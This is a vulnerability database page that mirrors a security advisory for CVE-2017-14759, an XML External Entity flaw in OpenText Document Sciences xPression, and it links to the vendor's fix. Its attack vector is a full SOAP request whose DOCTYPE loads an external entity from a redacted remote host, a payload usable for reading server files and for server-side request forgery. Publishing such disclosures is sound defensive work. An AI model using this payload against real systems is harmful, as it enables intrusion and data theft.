Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMariusz WoloszynPACKETSTORM:144447
HistorySep 29, 2017 - 12:00 a.m.

OpenText Document Sciences xPression 4.5SP1 Patch 13 XML Injection

2017-09-2900:00:00
Mariusz Woloszyn
packetstormsecurity.com
47

EPSS

0.002

Percentile

64.7%

JSON
`Title: OpenText Document Sciences xPression (formerly EMC Document  
Sciences xPression) - XML External Entity  
Author: Marcin Woloszyn  
Date: 27. September 2017  
CVE: CVE-2017-14759  
  
Affected Software:  
==================  
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)  
  
Exploit was tested on:  
======================  
v4.5SP1 Patch 13 (older versions might be affected as well)  
  
XML External Entity:  
====================  
  
Application XML parser is accepting DOCTYPE in provided XML documents  
either directly or indirectly, using URL.  
This can be exploited in various of ways, e.g. to read directory  
listings, read system or application files,  
cause denial of service or issue requests on behalf of server (SSRF).  
  
Vector :  
--------  
  
POST /xFramework/services/QuickDoc.QuickDocHttpSoap11Endpoint/ HTTP/1.1  
Accept-Encoding: gzip,deflate  
Content-Type: text/xml;charset=UTF-8  
SOAPAction: "urn:publishDocument"  
Content-Length: 13689  
Host: [...cut...]  
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)  
Connection: close  
  
<soapenv:Envelope  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:web="http://webservice.framework.xprs.dsc.com">  
<soapenv:Header/>  
<soapenv:Body>  
<web:publishDocument>  
<web:requestContext><![CDATA[<!DOCTYPE m [ <!ENTITY % r  
SYSTEM "http://[...cut...]/m.xml"> %r; %i; %t; ]><RequestContext>  
<Credentials method="UserID and Password">  
<UserID>[...cut...]</UserID>  
<Password>[...cut...]</Password>  
</Credentials>  
<ApplicationName>ELease</ApplicationName>  
</RequestContext>]]>  
</web:requestContext>  
<web:documentName>[...cut...]</web:documentName>  
<web:customerData>  
<![CDATA[  
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xsi:noNamespaceSchemaLocation="C:\xPression\CustomerData\Schema\eLease_v0.3.xsd">  
<eLease>  
<PrintStatus>Final</PrintStatus>  
[...cut...]  
</eLease>  
</root>  
]]> </web:customerData>  
<!--Optional:-->  
<web:outputProfileName>PDF w Draftwatermark to  
File</web:outputProfileName>  
</web:publishDocument>  
</soapenv:Body>  
</soapenv:Envelope>  
  
Fix:  
====  
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774  
  
Contact:  
========  
mw[at]nme[dot]pl  
  
  
`

Related

cve 1
cvelist 1
nvd 1
prion 1
cve
cve
CVE-2017-14759
2017-10-03 01:29:02
cvelist
cvelist
CVE-2017-14759
2017-10-02 17:00:00
nvd
nvd
CVE-2017-14759
2017-10-03 01:29:02
prion
prion
Xxe
2017-10-03 01:29:00

EPSS

0.002

Percentile

64.7%

JSON
Related for PACKETSTORM:144447
cve1cvelist1nvd1prion1